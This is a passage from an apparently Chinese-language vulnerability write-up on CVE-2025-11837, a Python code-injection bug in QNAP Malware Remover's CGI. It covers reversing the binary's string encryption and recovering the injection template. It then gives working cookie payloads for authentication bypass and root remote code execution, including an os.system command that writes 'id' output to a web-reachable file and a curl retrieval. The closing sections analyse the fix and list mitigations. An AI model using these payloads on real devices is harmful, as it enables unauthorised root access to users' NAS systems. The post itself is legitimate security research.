17
</pre></td><td class="rouge-code"><pre><span class="k">while</span> <span class="p">(</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">v8</span> <span class="o">=</span> <span class="o">*</span><span class="n">v7</span><span class="p">;</span>                               <span class="c1">// cookie 值</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">strlen</span><span class="p">(</span><span class="o">*</span><span class="n">v7</span><span class="p">)</span> <span class="o">&lt;=</span> <span class="mh">0x20</span><span class="p">)</span> <span class="p">{</span>              <span class="c1">// ① 长度校验 ≤ 32</span>
        <span class="n">v9</span> <span class="o">=</span> <span class="o">*</span><span class="p">(</span><span class="kt">unsigned</span> <span class="kr">__int8</span> <span class="o">*</span><span class="p">)</span><span class="n">v8</span><span class="p">;</span>
        <span class="k">if</span> <span class="p">((</span><span class="n">_BYTE</span><span class="p">)</span><span class="n">v9</span><span class="p">)</span> <span class="p">{</span>
            <span class="n">v10</span> <span class="o">=</span> <span class="n">v8</span><span class="p">;</span>
            <span class="k">while</span> <span class="p">(</span><span class="n">isalnum</span><span class="p">(</span><span class="n">v9</span><span class="p">))</span> <span class="p">{</span>           <span class="c1">// ② 逐字符 isalnum 白名单 ← 新增</span>
                <span class="n">v9</span> <span class="o">=</span> <span class="o">*</span><span class="p">(</span><span class="kt">unsigned</span> <span class="kr">__int8</span> <span class="o">*</span><span class="p">)</span><span class="o">++</span><span class="n">v10</span><span class="p">;</span>
                <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="p">(</span><span class="n">_BYTE</span><span class="p">)</span><span class="n">v9</span><span class="p">)</span> <span class="k">goto</span> <span class="n">LABEL_28</span><span class="p">;</span>
            <span class="p">}</span>
            <span class="k">goto</span> <span class="n">LABEL_25</span><span class="p">;</span>                  <span class="c1">// 含非 alnum → 跳过该 cookie</span>
        <span class="p">}</span>
<span class="nl">LABEL_28:</span>
        <span class="n">snprintf</span><span class="p">(</span><span class="n">v116</span><span class="p">,</span> <span class="mh">0x400</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">byte_21A000</span><span class="p">,</span> <span class="n">v86</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="n">v16</span><span class="p">);</span>
        <span class="n">sub_95D0</span><span class="p">(...);</span>                      <span class="c1">// popen_pipeline_exec</span>
    <span class="p">}</span>
<span class="p">}</span>
</pre></td></tr></tbody></table></code></div></div>

<p>6.6.7 将 cookie 值不做任何校验即拼入一个字符串模板并执行。6.6.8 在拼接前增加双重校验：长度不超过 32，且每个字符均为字母或数字。</p>

<h3 id="字符串加密对分析的限制"><span class="me-2">字符串加密对分析的限制</span><a href="#字符串加密对分析的限制" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>

<p>回看 6.6.7 的关键调用：</p>

<div class="language-c highlighter-rouge"><div class="code-header">
        <span data-label-text="C"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre><span class="n">sub_9570</span><span class="p">(</span><span class="n">s1</span><span class="p">,</span> <span class="mi">64</span><span class="p">,</span> <span class="o">::</span><span class="n">dest</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">unk_16294</span><span class="p">,</span> <span class="n">v114</span><span class="p">,</span> <span class="p">...);</span>
</pre></td></tr></tbody></table></code></div></div>

<p>三个关键操作数在 IDA 中均为密文占位符，看不到任何明文：</p>

<div class="table-wrapper"><table>
  <thead>
    <tr>
      <th>操作数</th>
      <th>IDA 显示</th>
      <th>实际含义（未知）</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td><code class="language-plaintext highlighter-rouge">::dest</code></td>
      <td>无明文字符串</td>
      <td>解释器路径（<code class="language-plaintext highlighter-rouge">sh</code>？<code class="language-plaintext highlighter-rouge">python</code>？）</td>
    </tr>
    <tr>
      <td><code class="language-plaintext highlighter-rouge">&amp;unk_16294</code></td>
      <td><code class="language-plaintext highlighter-rouge">unk_</code>（unknown）前缀</td>
      <td>命令参数（<code class="language-plaintext highlighter-rouge">-c</code>？还是别的？）</td>
    </tr>
    <tr>
      <td><code class="language-plaintext highlighter-rouge">&amp;byte_21A9C0</code>（上一行 snprintf 的模板）</td>
      <td><code class="language-plaintext highlighter-rouge">byte_</code> 前缀</td>
      <td>命令/代码模板（如何拼 cookie？）</td>
    </tr>
  </tbody>
</table></div>

<p><code class="language-plaintext highlighter-rouge">unk_</code> 和 <code class="language-plaintext highlighter-rouge">byte_</code> 前缀是 IDA 的明确信号：这些位置存储的是原始字节数据，未被识别为字符串——因为它们是密文。</p>

<p>虽然从修复版的 <code class="language-plaintext highlighter-rouge">isalnum</code> 白名单已知注入载体是 cookie，但从这一行无法看出注入到<strong>什么里面</strong>。以下三种组合对应<strong>完全不同的利用方式</strong>：</p>

<ul>
  <li>模板为 <code class="language-plaintext highlighter-rouge">sh -c "...%s..."</code> → shell 注入，payload 为 <code class="language-plaintext highlighter-rouge">;command</code>（CWE-78）</li>
  <li>模板为 <code class="language-plaintext highlighter-rouge">python -c "...%s..."</code> → Python 代码注入，payload 为 <code class="language-plaintext highlighter-rouge">');import os;...</code>（CWE-94）</li>
  <li>模板的引号风格（<code class="language-plaintext highlighter-rouge">'</code> / <code class="language-plaintext highlighter-rouge">"</code> / 无引号）决定 payload 的闭合方式</li>
</ul>

<p>CVE 情报标注为 CWE-94（代码注入），但情报需要验证——只有解出模板明文，才能确认注入语言，进而构造可用的 PoC。在模板明文未知的情况下：</p>

<ul>
  <li>未知注入语言 → 无法构造 payload 语法</li>
  <li>未知引号风格 → 无法确定闭合方式</li>
  <li>甚至无法区分 CWE-78 与 CWE-94</li>
</ul>

<p><strong>结论：字符串解密成为分析的硬性卡点。</strong> 模板、解释器、参数这三个明文未解出，后续所有 PoC 构造均无从下手。因此此时必须暂时离开漏洞逻辑本身，转向逆向字符串加密算法——这正是 QNAP 这类厂商二进制的典型反分析手段：<strong>逻辑不藏，只藏字符串</strong>，要求分析者先破解字符串层才能继续。</p>

<h2 id="逆向字符串加密算法"><span class="me-2">逆向字符串加密算法</span><a href="#逆向字符串加密算法" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<p><code class="language-plaintext highlighter-rouge">main</code> 启动时调用了一批 <code class="language-plaintext highlighter-rouge">sub_B420</code> / <code class="language-plaintext highlighter-rouge">sub_B3C0</code>，对 <code class="language-plaintext highlighter-rouge">.data</code> 段的密文做解密。反编译解密函数，加密分两个阶段。</p>

<p>第二阶段（减法解密，<code class="language-plaintext highlighter-rouge">sub_B3C0</code>）：</p>

<div class="language-c highlighter-rouge"><div class="code-header">
        <span data-label-text="C"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
</pre></td><td class="rouge-code"><pre><span class="kt">void</span> <span class="nf">sub_B3C0</span><span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="n">dest</span><span class="p">,</span> <span class="kt">char</span> <span class="o">*</span><span class="n">s</span><span class="p">)</span> <span class="p">{</span>
    <span class="kt">int</span> <span class="n">v2</span> <span class="o">=</span> <span class="n">strlen</span><span class="p">(</span><span class="n">s</span><span class="p">);</span>        <span class="c1">// 密钥长度</span>
    <span class="kt">int</span> <span class="n">v3</span> <span class="o">=</span> <span class="n">strlen</span><span class="p">(</span><span class="n">dest</span><span class="p">);</span>     <span class="c1">// 密文长度</span>
    <span class="kt">char</span> <span class="o">*</span><span class="n">v4</span> <span class="o">=</span> <span class="n">calloc</span><span class="p">(</span><span class="n">v3</span> <span class="o">+</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">1</span><span class="p">);</span>
    <span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">v3</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span>
        <span class="n">v4</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">=</span> <span class="n">dest</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">-</span> <span class="n">s</span><span class="p">[</span><span class="n">i</span> <span class="o">%</span> <span class="n">v2</span><span class="p">];</span>   <span class="c1">// 带符号字节减法</span>
    <span class="n">strncpy</span><span class="p">(</span><span class="n">dest</span><span class="p">,</span> <span class="n">v4</span><span class="p">,</span> <span class="n">v3</span><span class="p">);</span>
    <span class="n">free</span><span class="p">(</span><span class="n">v4</span><span class="p">);</span>
<span class="p">}</span>
</pre></td></tr></tbody></table></code></div></div>

<p>第一阶段（XOR 预处理，<code class="language-plaintext highlighter-rouge">sub_B4C0</code> / <code class="language-plaintext highlighter-rouge">sub_B520</code>）：</p>

<div class="language-c highlighter-rouge"><div class="code-header">
        <span data-label-text="C"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre></td><td class="rouge-code"><pre><span class="c1">// 用单字节 v6 = a2 ^ a3 = 243 ^ 246 = 5 对密钥本身做 XOR</span>
<span class="n">v6</span> <span class="o">=</span> <span class="mi">243</span> <span class="o">^</span> <span class="mi">246</span><span class="p">;</span>  <span class="c1">// = 0x05</span>
<span class="k">for</span> <span class="p">(</span><span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">len</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span>
    <span class="n">key</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">^=</span> <span class="n">v6</span><span class="p">;</span>
</pre></td></tr></tbody></table></code></div></div>

<p>第一次解密直接用原始密钥做 <code class="language-plaintext highlighter-rouge">cipher - key</code>，结果全是乱码。原因在于 <code class="language-plaintext highlighter-rouge">sub_B520</code> 会先用 <code class="language-plaintext highlighter-rouge">0x05</code> 对<strong>密钥本身</strong>做一次 XOR 预处理，真实密钥不等于原始密钥。修正后：</p>

<div class="language-python highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre></td><td class="rouge-code"><pre><span class="n">real_key</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">=</span> <span class="n">raw_key</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">^</span> <span class="mh">0x05</span>            <span class="c1"># 先预处理密钥
</span><span class="n">plain</span><span class="p">[</span><span class="n">i</span><span class="p">]</span>    <span class="o">=</span> <span class="n">cipher</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">-</span> <span class="n">real_key</span><span class="p">[</span><span class="n">i</span> <span class="o">%</span> <span class="mi">32</span><span class="p">]</span>  <span class="c1"># 再用预处理后的密钥解密
</span></pre></td></tr></tbody></table></code></div></div>

<p>全局密钥位于 <code class="language-plaintext highlighter-rouge">0x21aa40</code>，长 32 字节。</p>

<h2 id="注入点还原"><span class="me-2">注入点还原</span><a href="#注入点还原" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<p>用一段 IDA Python 脚本在 6.6.7 的 IDB 中解出所有关键字段，结果如下：</p>

<div class="table-wrapper"><table>
  <thead>
    <tr>
      <th>地址</th>
      <th>用途</th>
      <th>解密明文</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>0x21aa20</td>
      <td>解释器路径</td>
      <td><code class="language-plaintext highlighter-rouge">/mnt/ext/opt/Python/bin/python</code></td>
    </tr>
    <tr>
      <td>0x21a9c0</td>
      <td><strong>认证模板</strong></td>
      <td><code class="language-plaintext highlighter-rouge">import sys;sys.path.append('%s');from qnap_helper import check_sid;print(check_sid('%s'))</code></td>
    </tr>
    <tr>
      <td>0x21a940</td>
      <td>业务模板头</td>
      <td><code class="language-plaintext highlighter-rouge">import sys;sys.path.append('%s');from web_interface import WebInterface;</code></td>
    </tr>
    <tr>
      <td>0x21a900</td>
      <td>scan 动作</td>
      <td><code class="language-plaintext highlighter-rouge">print(WebInterface().start_scanning())</code></td>
    </tr>
    <tr>
      <td>0x21a8c0</td>
      <td>stop</td>
      <td><code class="language-plaintext highlighter-rouge">print(WebInterface().stop_scanning())</code></td>
    </tr>
    <tr>
      <td>0x21a880</td>
      <td>status</td>
      <td><code class="language-plaintext highlighter-rouge">print(WebInterface().get_scan_status())</code></td>
    </tr>
    <tr>
      <td>0x21a840</td>
      <td>setting GET</td>
      <td><code class="language-plaintext highlighter-rouge">print(WebInterface().get_setting())</code></td>
    </tr>
    <tr>
      <td>0x21a800</td>
      <td>setting PUT</td>
      <td><code class="language-plaintext highlighter-rouge">print(WebInterface().set_setting(sys.argv[1]))</code></td>
    </tr>
    <tr>
      <td>0x21a7c0</td>
      <td>background_task</td>
      <td><code class="language-plaintext highlighter-rouge">print(WebInterface().background_task())</code></td>
    </tr>
    <tr>
      <td>0x21a780</td>
      <td>about</td>
      <td><code class="language-plaintext highlighter-rouge">print(WebInterface().get_about_info())</code></td>
    </tr>
    <tr>
      <td>0x21a740</td>
      <td>system_status</td>
      <td><code class="language-plaintext highlighter-rouge">print(WebInterface().get_system_status())</code></td>
    </tr>
    <tr>
      <td>0x16294</td>
      <td>参数</td>
      <td><code class="language-plaintext highlighter-rouge">-c</code></td>
    </tr>
    <tr>
      <td>0x21a9a6</td>
      <td>cookie 名 #0</td>
      <td><code class="language-plaintext highlighter-rouge">QTS_SSID</code></td>
    </tr>
    <tr>
      <td>0x21a999</td>
      <td>cookie 名 #1</td>
      <td><code class="language-plaintext highlighter-rouge">QTS_SSL_SSID</code></td>
    </tr>
    <tr>
      <td>0x21a991</td>
      <td>cookie 名 #2</td>
      <td><code class="language-plaintext highlighter-rouge">NAS_SID</code></td>
    </tr>
    <tr>
      <td>0x21a989</td>
      <td>cookie 名 #3</td>
      <td><code class="language-plaintext highlighter-rouge">nas_sid</code></td>
    </tr>
  </tbody>
</table></div>

<p>根据 <code class="language-plaintext highlighter-rouge">0x21a9c0</code> 字段可以确定漏洞性质：<strong>这不是 shell 注入，而是 Python 代码注入。</strong></p>

<p>CGI 将 cookie 值拼入一段 Python 源码：</p>

<div class="language-python highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre></td><td class="rouge-code"><pre><span class="kn">import</span> <span class="n">sys</span><span class="p">;</span><span class="n">sys</span><span class="p">.</span><span class="n">path</span><span class="p">.</span><span class="nf">append</span><span class="p">(</span><span class="sh">'</span><span class="s">%s</span><span class="sh">'</span><span class="p">);</span>
<span class="kn">from</span> <span class="n">qnap_helper</span> <span class="kn">import</span> <span class="n">check_sid</span><span class="p">;</span>
<span class="nf">print</span><span class="p">(</span><span class="nf">check_sid</span><span class="p">(</span><span class="sh">'</span><span class="s">&lt;cookie值&gt;</span><span class="sh">'</span><span class="p">))</span>     <span class="c1"># ← 攻击者控制这里
</span></pre></td></tr></tbody></table></code></div></div>

<p>然后用 <code class="language-plaintext highlighter-rouge">/mnt/ext/opt/Python/bin/python -c &lt;整段脚本&gt;</code> 执行。攻击者只需闭合 <code class="language-plaintext highlighter-rouge">check_sid('...')</code> 的单引号，即可注入任意 Python 表达式。这与 CWE-94（Improper Control of Generation of Code）的定义一致——拼出来的字符串是代码，不是数据。</p>

<p>这也解释了它与此前的 QSA-21-16 的区别：QSA-21-16 是命令注入，本次是 Python 代码注入。形式不同，但根本原因相同——外部输入未经校验即被拼入可执行内容。</p>

<p>完整调用链：</p>

<div class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
</pre></td><td class="rouge-code"><pre>攻击者 HTTP 请求
  │  Cookie: QTS_SSID=&lt;注入载荷&gt;
  ▼
Apache (rewrite → malware_remover.cgi)
  ▼
main() 读取 HTTP_COOKIE
  │  正则提取 QTS_SSID=&lt;value&gt;        ← 无校验
  │  snprintf(模板, modules路径, &lt;value&gt;)  ← 拼接 Python 源码
  ▼
popen_pipeline_exec("python","-c",&lt;脚本&gt;)
  │  pipe + fork + dup2 + execvp
  ▼
Python 执行攻击者构造的代码  ← RCE
</pre></td></tr></tbody></table></code></div></div>

<p>CGI 还会用 <code class="language-plaintext highlighter-rouge">strncasecmp(result, "True", 4)</code> 判断 Python 的输出是否以 <code class="language-plaintext highlighter-rouge">True</code> 开头来决定认证是否通过。因此注入不仅能执行代码，还能同时绕过认证。</p>

<h2 id="poc-构造与-cookie-字符约束"><span class="me-2">PoC 构造与 Cookie 字符约束</span><a href="#poc-构造与-cookie-字符约束" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<p>注入逻辑较为直接：闭合 <code class="language-plaintext highlighter-rouge">check_sid('...')</code> 的单引号，插入任意表达式。最初构造的 payload 如下：</p>

<div class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>x')+(__import__('os').system('echo PWN'))+check_sid('
</pre></td></tr></tbody></table></code></div></div>

<p>拼出来的 Python 是一句合法表达式。但实测时所有 payload 全部失败，均返回 <code class="language-plaintext highlighter-rouge">{"status":401}</code>：</p>

<div class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre></td><td class="rouge-code"><pre>基线 AAAA:           1.07s  HTTP 200  {"status":401}
认证绕过:            1.12s  HTTP 200  {"status":401}  ← 应该是 200
语法破坏 zzz))):     0.05s  HTTP 200  {"status":401}
异常触发 1/0:        0.02s  HTTP 200  {"status":401}
</pre></td></tr></tbody></table></code></div></div>

<p>关键线索在响应耗时。纯字母数字的 cookie 耗时 1.07 秒，与 Python 解释器启动时间相符，说明请求确实进入了 CGI。而含特殊字符的 payload 耗时仅 0.05 秒，时间过短，CGI 未被调用，Web 服务器在请求到达 CGI 之前就拒绝了请求。</p>

<p>问题出在 HTTP Cookie 值的合法字符集上。RFC 6265 加上 Apache 的严格解析，cookie 值中不允许出现空格。而最初的 payload 在 <code class="language-plaintext highlighter-rouge">or</code>、<code class="language-plaintext highlighter-rouge">import</code> 等关键字后带有空格，Apache 检测到空格即丢弃整个请求。</p>

<p>解决办法是用 TAB（<code class="language-plaintext highlighter-rouge">\t</code>）替代空格。TAB 不在 cookie 禁用字符列表中，Python 词法分析器将其视为空白符，shell 也接受其作为命令分隔符。修正后的认证绕过 payload：</p>

<div class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>x')or'TruePWN'or('
</pre></td></tr></tbody></table></code></div></div>

<p>该 payload 不含空格，可直接使用。含 Python 关键字的 RCE payload 在关键字之间使用 TAB：</p>

<div class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>x')or	__import__('time').sleep(6)	or'TrueSLEEP'or(
</pre></td></tr></tbody></table></code></div></div>

<h2 id="认证绕过验证"><span class="me-2">认证绕过验证</span><a href="#认证绕过验证" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<p>首先验证认证绕过。payload 为 <code class="language-plaintext highlighter-rouge">x')or'TruePWN'or('</code>，拼出的 Python：</p>

<div class="language-python highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre><span class="nf">print</span><span class="p">(</span><span class="nf">check_sid</span><span class="p">(</span><span class="sh">'</span><span class="s">x</span><span class="sh">'</span><span class="p">)</span><span class="ow">or</span><span class="sh">'</span><span class="s">TruePWN</span><span class="sh">'</span><span class="ow">or</span><span class="p">(</span><span class="sh">''</span><span class="p">))</span>
</pre></td></tr></tbody></table></code></div></div>

<p>执行逻辑：<code class="language-plaintext highlighter-rouge">check_sid('x')</code> 返回 falsy（’x’ 不是有效会话），<code class="language-plaintext highlighter-rouge">or</code> 短路求值得到 <code class="language-plaintext highlighter-rouge">'TruePWN'</code>，<code class="language-plaintext highlighter-rouge">print</code> 输出以 <code class="language-plaintext highlighter-rouge">True</code> 开头的字符串，CGI 的 <code class="language-plaintext highlighter-rouge">strncasecmp</code> 判定认证通过，进入 <code class="language-plaintext highlighter-rouge">action=status</code> handler 返回受保护数据。实测返回 <code class="language-plaintext highlighter-rouge">status:200</code> 的扫描状态 JSON，认证绕过成立。</p>

<p><a href="/assets/img/20260622/20260701-152352.jpg" class="popup img-link  shimmer"><img src="/assets/img/20260622/20260701-152352.jpg" alt="" loading="lazy"></a></p>

<h2 id="命令回显"><span class="me-2">命令回显</span><a href="#命令回显" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<p>认证注入路径无法获取回显，要实现命令输出回显，需要另一种方式：将命令结果写入 web 可达目录，再通过 HTTP GET 取回。Apache 配置中的 Alias 暴露了路径：</p>

<div class="language-apache highlighter-rouge"><div class="code-header">
        <span data-label-text="Apache"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre><span class="nc">Alias</span> /malware_remover "/home/httpd/cgi-bin/qpkg/MalwareRemover"
</pre></td></tr></tbody></table></code></div></div>

<p><code class="language-plaintext highlighter-rouge">/home/httpd/cgi-bin/qpkg/MalwareRemover/</code> 目录经 Alias 映射，可通过 <code class="language-plaintext highlighter-rouge">/malware_remover/&lt;filename&gt;</code> 直接拉取。payload 让 <code class="language-plaintext highlighter-rouge">id</code> 命令的输出重定向到该目录下的 <code class="language-plaintext highlighter-rouge">leak.txt</code>：</p>

<div class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>Cookie: QTS_SSID=x')or[__import__('os').system('id&gt;	/home/httpd/cgi-bin/qpkg/MalwareRemover/leak.txt'),'TrueRCE'][1]or(
</pre></td></tr></tbody></table></code></div></div>

<p>这里用列表索引 <code class="language-plaintext highlighter-rouge">[system(...),'TrueRCE'][1]</code> 保证表达式返回 <code class="language-plaintext highlighter-rouge">'TrueRCE'</code>（使 CGI 认证通过），同时 <code class="language-plaintext highlighter-rouge">os.system</code> 的副作用已写入文件。随后通过 <code class="language-plaintext highlighter-rouge">curl https://target/malware_remover/leak.txt</code> 取回：</p>

<div class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre></td><td class="rouge-code"><pre>id:      uid=0(admin) gid=0(administrators) groups=0(administrators),100(everyone)
uname:   Linux NAS50F9BF 5.10.60-qnap #1 SMP Fri Apr 19 02:06:34 CST 2024 x86_64
whoami:  admin
passwd:  admin:x:0:0:administrator,,,:/share/homes/admin:/bin/sh
</pre></td></tr></tbody></table></code></div></div>

<p>以 <code class="language-plaintext highlighter-rouge">uid=0</code>（root）身份执行，可读取 <code class="language-plaintext highlighter-rouge">/etc/passwd</code> 等敏感文件。</p>

<h2 id="修复方案分析"><span class="me-2">修复方案分析</span><a href="#修复方案分析" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<p>6.6.8 的修复落在 <code class="language-plaintext highlighter-rouge">main</code> 函数中，针对 cookie 值增加两道校验：长度不超过 32 字节，且每个字符均通过 <code class="language-plaintext highlighter-rouge">isalnum</code> 校验。这两条限制切断了单引号闭合与表达式注入的可能——攻击者无法再向模板中插入任何非字母数字字符，Python 代码注入的入口被关闭。</p>

<p>从工程角度看，修复点选择准确：没有重写认证模板，也没有改执行方式，而是在「外部输入进入代码模板」这道边界上做白名单。这是 CWE-94 类问题最彻底的修法——既然无法信任拼入源码的输入，那就在拼接之前确保它只能是纯字母数字。</p>

<h2 id="方法论回顾"><span class="me-2">方法论回顾</span><a href="#方法论回顾" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<div class="table-wrapper"><table>
  <thead>
    <tr>
      <th>阶段</th>
      <th>发现</th>
      <th>意义</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>导入表 diff</td>
      <td><code class="language-plaintext highlighter-rouge">isalnum</code> 是唯一新增</td>
      <td>一个符号即定性整个漏洞</td>
    </tr>
    <tr>
      <td>字符串解密</td>
      <td><code class="language-plaintext highlighter-rouge">check_sid('%s')</code> 是 Python</td>
      <td>将漏洞定性从 shell 注入改为代码注入</td>
    </tr>
    <tr>
      <td>PoC 全失败</td>
      <td>cookie 值禁空格</td>
      <td>解释所有失败，TAB 为绕过点</td>
    </tr>
  </tbody>
</table></div>

<p>回顾分析过程，效率最高的第一步是导入表 diff。一个 <code class="language-plaintext highlighter-rouge">isalnum</code> 的新增，配合 CWE-94 的标签，几乎不需要查看反编译即可判断漏洞性质。字符串解密中的 XOR 密钥预处理应更早注意到。而 cookie 禁空格这一问题，若一开始即用最小 payload（只闭合单引号、不带任何空格）测试，可减少不少排查时间。</p>

<h2 id="时间线"><span class="me-2">时间线</span><a href="#时间线" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<div class="table-wrapper"><table>
  <thead>
    <tr>
      <th>日期</th>
      <th>事件</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>2025-10-23</td>
      <td>修复版本 6.6.8.20251023 发布</td>
    </tr>
    <tr>
      <td>2026-06-22</td>
      <td>固件逆向分析，定位并复现漏洞</td>
    </tr>
  </tbody>
</table></div>

<h2 id="缓解措施"><span class="me-2">缓解措施</span><a href="#缓解措施" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<ol>
  <li><strong>立即升级</strong>到 Malware Remover 6.6.8.20251023 或更新版本</li>
  <li>如果无法立即升级，限制 NAS 管理接口的网络暴露面，避免公网直接可达</li>
  <li>检查 Web 访问日志中是否存在异常的 <code class="language-plaintext highlighter-rouge">/malware_remover/</code> 请求或可疑 Cookie 值</li>
</ol>

<h2 id="总结"><span class="me-2">总结</span><a href="#总结" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<p>CVE-2025-11837 是一个被「代码注入」标签和空白的公开资料所掩盖的典型 Python 代码注入漏洞。其难度不在利用——闭合单引号、插入表达式属于标准操作——而在于从两个版本之间的一个 <code class="language-plaintext highlighter-rouge">isalnum</code> 新增，逆推到被字符串加密掩盖的 Python 模板，再确认注入的真实形式是源码拼接而非 shell 命令拼接。</p>

<p>该案例表明，CWE-94 不一定意味着 <code class="language-plaintext highlighter-rouge">eval</code> 或 shell 调用，凡是「外部输入被拼入一段可执行代码文本」均属此类。修复也指出了正确的边界位置：不要试图净化整段代码，而是在输入进入模板之前将其限定为纯字母数字。</p>

<h2 id="参考链接"><span class="me-2">参考链接</span><a href="#参考链接" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<ul>
  <li><a href="https://www.qnap.com/en-us/security-advisory/qsa-25-47">QNAP Security Advisory QSA-25-47 (Malware Remover, PWN2OWN 2025)</a></li>
  <li><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-11837">NVD CVE-2025-11837</a></li>
</ul>


  </div>

  <div class="post-tail-wrapper text-muted">
    <!-- categories -->
    
      <div class="post-meta mb-3">
